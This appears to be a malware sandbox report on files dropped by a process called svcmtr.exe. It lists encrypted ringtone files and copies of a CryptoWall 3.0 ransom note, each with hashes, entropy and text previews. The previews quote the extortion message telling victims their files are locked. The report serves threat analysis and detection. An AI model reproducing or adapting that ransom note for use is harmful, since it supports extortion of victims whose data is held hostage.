                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...z.{..G..dG..O..p..r...3.[...5x.......Q3....ZQ...f&.......|..]...5Rc...I.,.7v`,.]..fn....D.r1.x.;.4...|....F.0...q...fE.......m.../....S.l.|.b...!._.....I.......V-..` ..[N2`...0@.sR.y|wx_K.....s..[....PdK2.&.........>..T....M0..P..+.....~..k.p.v.....t.W.)..'.[.ZO.Hr^.U.6....^!.0W.9MT..D.lQ..{..q..U.u..%[.}..\d..v..kL.j-F.5.l.g..B...MR..:9.$.g.d.z..[..\..^Z.'N..A....$.u........_...=..D,:...es...!(7....=.Vk_.K..:Kz.g4.c..h.G...p{......jJ..W..^,....;..M....k.....0....=......cH...S.[.e(D...F..V..L..[....]Bp.W..xt..C....Qh3....&s....|B. .*.Of.x..R...q...ay,.H.U.wO..}..<I.....

                                                                                                                          C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 04.wma

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):238046
                                                                                                                          Entropy (8bit):7.999182213002957
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:6144:2Zm/ctnx6ARQEOoIcKrYeIDEu2M2Y7jbmvnHcCN:2Y06KQEXID0/Dp2MZPm1N
                                                                                                                          MD5:E33D8BB35F8206E9FEC679DCE5198902
                                                                                                                          SHA1:699F290DA94D14749CF09EFB882C2C9B6C599781
                                                                                                                          SHA-256:2BF5FFDF6C849942093343835BB7A68865E0C9D299795C5C09B15A41FCB6FB7C
                                                                                                                          SHA-512:96315A191B805AB97B36DEA8A53E6B3B8F8A0BC1E86E7DF4CA054B7B4145620EFD7E0FB5E38337ABE4EDE41D67AE344FA85F7F0D21377C8A311D115613B99AB1
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...$_U|.X..^. [r..9...6c.(4OIR.!...L.!.~.e....f..d...........$...gB.......*D..(..`.p...oif..O..s.._..ljd#..y."6..s..O....'..`..$MGidNN...;...t......%J.........W.9~......Bt......M..S.%6.~.5s69.Z.{ .}..;N.$.*S...}D]....-.p.j.....$...B..d..ml...e&e...p..A.....`'w.E%38".Fw.K8.t9..2....[......ew....I..-v.j...}q.i.t.&.L.I...G.f.xj. )5...C.vp..F`..40....".I.0.(..D..v_3?......!...n..Hu......mR...L.7..V.....K.l.^..u.#.p.PVL.)...t.........1ZhC.:..9"9b..a.....Wn.L.d....B.Q....xv..t....g..P.}^i.[.alE..2.,..u....cu9.N.]...mQ...y.?>f.X..n......^y...b[.0N.........M.....f...F.N..=.h...i...

                                                                                                                          C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 05.wma

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):112782
                                                                                                                          Entropy (8bit):7.998677666438719
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:IgHP0BNzrPhTHNUx+bG8wGOdMqYRK3ibtarQD:8NzrZTtTk5iBqQD
                                                                                                                          MD5:6F55A572F1094DB3F8B9514286E13AAA
                                                                                                                          SHA1:FF9D23673B0942AA35174420F1ECEAE45E19C0F7
                                                                                                                          SHA-256:6D9A58D3C6C690C94161A058D7CFA6746AF9A1C20F677232707ACC61947A0401
                                                                                                                          SHA-512:C98C8F53B185AEC9C0B3957008699DF62E14CE01AD352D6638B0B3B21D55A084BAE6AC1A6DE4A8C86917CCF3B5071629F8FA7BD3A734441678B46670CD390514
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...l..h..`........[...y....mCKmZrV.... .}......GE...9..S..vJ.*.>S...'8Or..X.Z.}.x...ax..g..^..H..D.i.V*...Y.......K..#.?..3.g;.P^..XV.6.*.h.$....g...{..9oo...gQ{.N.d...S....Wey]T.....~.w..W.a.M.).-r.J.\..Fc..!..&w....AR\..w~......{.@9.P.x.7..?&.J...;nP>..u...(..cM.;....}.J.......o.:"...i..w.1.....,.V.....T"=..UR..AI@....r..f..K6K:'...{T...1bh....Z..v~.R......&.B.v...tf....~.......B.R........i....b..C,..d...Q..v...9lK. *.d..`9.9^..B....c.r.z....&.u.|=u...0h.1*.oA)jl.cXV.G.g....\..v.Ee.j.].k........4.M/.@..n..S6...{'{..:......a..{.;.].|..."){.'...q..i.u..&....4n5b*k...G..

                                                                                                                          C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 06.wma

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):94878
                                                                                                                          Entropy (8bit):7.9980371289190595
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:VXe0033wVR6+Yi+qkoqEKDlKH7hb35MWTAmHpeI086c349ONHxGX/kfdTB4hv/YM:VuPn+0VivkHKZnx086f9ONHK/MBov//J
                                                                                                                          MD5:04A505AAE0DE54D383A2864C42ABF83B
                                                                                                                          SHA1:3ABE2BC6E2E127D61842614985AD80B662287896
                                                                                                                          SHA-256:73CF7FD7EB0EC82788AC290D39DB00181A7E01DD21C8B122D5D5B9051526436D
                                                                                                                          SHA-512:A31780406631D592E1E01A8EBF3EB5415F1F3AAD07F04A16817996F31878F5A1D6169AC9AB18120C565D22D3478B36073074989DD062B926FD41139F9CAACEE3
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...e. ....,1...A..p...8...7,8.N>..m..K..9.Z..}..x..%!Z. ..A.+@&.......:....&uS.*.l....Gc2...j..n.A....D.....7...9....M."CkyC..F....,cG....v.' l.....%f.....0=6B/|.c...x..)w5.........L.;..$e......:....z.&r....XJ2..."..,.E......Q....U>....PF0p..E.g.....y.......r..?).....Q......<.[..r.2.....p\.C|Q..L.m.>.vO..S.jh.p8Ig.R..V...d.O8...,.$UO.. ]...PN.,.GA%....l....Q...~.{d..O......l.......[...T.?d...&..2..pb....g.G.../.f.4......{....#_.9u>Bw^...$..S...4}..6.Wq..4c..Rw.yn)7KL...._.....B3t.&I...A.;..o.9Y/....@........@T|....%'....;....u.....jK..,v...Qf.x.;.......}.rdW...x.G..

                                                                                                                          C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 07.wma

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):94878
                                                                                                                          Entropy (8bit):7.997887264203218
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:sii4M4pnwnv28C6yHLtK6Ph4ESaWYEb4pQI5xwJXXR08NuRknaS5wagDzo8INhV9:HnM4pwn+8CxZ1SaWYYl5hXm5SnaOrmol
                                                                                                                          MD5:A8163D261CB81067929DBE94A35AD098
                                                                                                                          SHA1:C4E5CE0656766325A8665C0A6015EB0A2664D2CC
                                                                                                                          SHA-256:DC5DDD6AB2104CE4A072A7344E54F7DC687E2C30B1E69747E11A4BC71C1006AF
                                                                                                                          SHA-512:DFB65AE0819FB30EFFD20524E8F43900ED743B2CF71A0788DECCA7AC097FF502D74EB7397B350D0543554D5BA161C4836BE5E431DFC0355DD148CA5151C14E45
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...0.4dN.b.......L.p.....Y5&..G.....4D..q.....8q..........K.?...H}/.u... ]~[....C.T.>.0..z.s1...._.wo..yl..%..>......X.qc.vb..(..&....?D6...>...uk..iqc.........O..C.....l<...)H.#o~.:.G......"........u..Z...?&v..Hj.a..D.I......i1....%..^..m.q.x.*.=."..n..V..4.{%...."x.p.%....U....=.aI.PF.......nf...gZ,.3$.b.VoO.=B.x..cB.p..}....{w..W.?~..&..........z....m...,A{.8b.T\3.U.#M^OS3)..&...}....h.;..R.W...._......y...Q.D}.6.....t.n.X.jZo.G.C.. ..>,...#*E...:/K.R@..x.E.<C..t.X.TQ...XUg>..$..l./{...:.o.D.k..$.L...,@.....9.../&<.r.....c:.....G.w..q|.../.<n.Z.@}i..y........?-`U.

                                                                                                                          C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 08.wma

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):139614
                                                                                                                          Entropy (8bit):7.9984534759836015
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:vh22Q3J5JRTIVgkG91y7ucbzqFQJ/fLG8KHRSz7MHpATIGP:vQjVIVKvy7ucBlfLhKEvDIGP
                                                                                                                          MD5:C492BDA69CD3F1D9EE4F0C66440A1F3B
                                                                                                                          SHA1:5C0802DB20057BDF31116A27C5939DD3B7C571B4
                                                                                                                          SHA-256:39921D8FBC985D583A162CD901C01127A6F295D23CDD870B93913FF9B86CB70D
                                                                                                                          SHA-512:AEF98D599D93A721954B7E2A981A98CAF31F95A93F5267A32510D281D1C75481CC440BEB2F5A9603E65F484844CDD3A4F861A288DC6C224973D72978167CA989
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264.......)+._&..*......4@]GU.-..9+7.5y...UR......P.P....,..5?.=#9jn..Y.....B.4..0.Q.o...K<.c.Vy.z.j...A..v..b4..A...x1.C3}UW..k....+.....*.T~.H1|?.g|.....J.\H._a..&..>.......#JNBj...3.|.Ub.J.;(.y...e=.5I..J<.VJ..D4^.......l..P+.O.n.T...O..%r..~3....1.......F*?N?...!.y.8.9"g..Y:I.%K.h.C.z..o.@@..x...J.._7...c.'..|...;0X.&usx....,.s...a.k.kb.1?. .hL...k.z..%.f.....r.b....0?H..|..M....J...e..U...,....$7/...GT`...H..F{.......6r..p]..^..c..Q.2.0..7.j.*.....%.1..L..e.S.Q........N.F.-|.....Ji^ .[.@$M..~...l..+...5...`...$s.O...m.x.Y.....&.....}~..$;.$bf.....J.X.w+s.~.~..5..W.....&....

                                                                                                                          C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 09.wma

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):112782
                                                                                                                          Entropy (8bit):7.998461573117077
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:u3FTY8yOyHyG/k1quwoC3HzvfZXUhdipshyzIKtTKKnNuw4V8g+AJK3L9I3QAGcf:u1TxyFz/jU4HbW0psWpNdYoOKb9xncqu
                                                                                                                          MD5:759EEF7B3674F7598D102B009F80784D
                                                                                                                          SHA1:8DE5077188531546069A338F08E62312CA80B428
                                                                                                                          SHA-256:4509D90F70464C9676E1BDBD46F4AA67930093110D43554369B9F61BD2F13F4C
                                                                                                                          SHA-512:01D2C20D5620056B1615ADC3572EA576A7C077CE54080F274B0CB44C4E8D16A014B2156CE59178EF2B1EED6D35722BA4813ECD60E864AA1DBA763E18E7D57708
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264....L~.U.B....aB......or..2.K_~.DS..E.....$_..|V..&..ya.[...... .@!.o..-.Xpo.\..F>.#:Qo<P..P+j....bIjIB7...D.....?+#'......%..p.....\.C}f....*5J|...n._d+.v.*.n.x.|GX.8....=...H..9.v:"..7..s..`$....zk#m..C&h3..Q...(F.6C...b...?(..=...#d.....~...W.q3N<.eDj..^......V`..w..%.AA..2....}Z5a.@4_..E.......+......!"'W).;.nJ.%7....*....6"...#C.........QR.Z.wK.m.>.o.S.#-..N..J......Y.S..5E.......$ ..7.{.O..6../3q..t..6..)...j..V..jc.9../.....l.......^.?R....v._2..G5..*....G\....U...~`....k7.....RG.h...t........s.+.."\."avS.....B..$.f"g.J..=w..6.G..*.=.M.r...].d.*...}...*...."......

                                                                                                                          C:\ProgramData\Microsoft\Windows\Ringtones\Ringtone 10.wma

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):94878
                                                                                                                          Entropy (8bit):7.99809516643394
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:VcQ+4MY/mJtprGgbIkJ759IK22DGjjyD2jvRvD8SDmDs5HReTyWkDMvbt:VmlIrEbxfDj2ZjDDHETADu
                                                                                                                          MD5:0CD36C25DB63B55810F524E8FAA406EC
                                                                                                                          SHA1:49E3A02EE8CD437620DC0E5C855430B0697C45F3
                                                                                                                          SHA-256:511D8D70ED9CC9E6CBF5476FA3B79CD9417BA35780CD02C5FBB9251AF98771CA
                                                                                                                          SHA-512:F1D58D87CC940DB6BF5AFE06AB4F5FB40597357E93A7D40FC9C2A76136F55279E2CCE6A2222628B51A5971D975D2F4178D52C3030D4272FD392528082EDCA200
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264....L^."..4nka.;IT.p..O@.....H...N(\......`..f...?.L.B|.W.2/U...E......)~...K..K.vY..V<../.D.(....6.:.."..{.FX...B..h..\vo...T>S.`..U.......>..[F..2.]........^....B..L..j1hg.D..w.3.j..$..a.....X....FB...y.S.P}....=.Q..~`...+B]'6D5M...n.2{.(...B..WL..b\.S.;..c.QC.n...+#/......v...=.*".U.~i...[V.>tq...K....D1*......AR>...q..t...r.Q..h-3.*...........".D[..8...-v.\..Dg...../9Q..k..+^.x].*ku.z.?..zq4{..d........xoJK.<q:.MV.-....?.C.,/H0._RCjz.........3......~.x....W4k.k.6...x.q..r. .+j....w........}L.*.....2.rv..9....@.....6...CX..a.T..p.\......u.1.`...g=.k[8....2K...q..........?{!V..Y.LQ

                                                                                                                          C:\ProgramData\Microsoft\Windows\Ringtones\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Microsoft\Windows\Ringtones\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\Windows\Sqm\Upload\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Microsoft\Windows\Sqm\Upload\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\Windows\Sqm\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Microsoft\Windows\Sqm\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
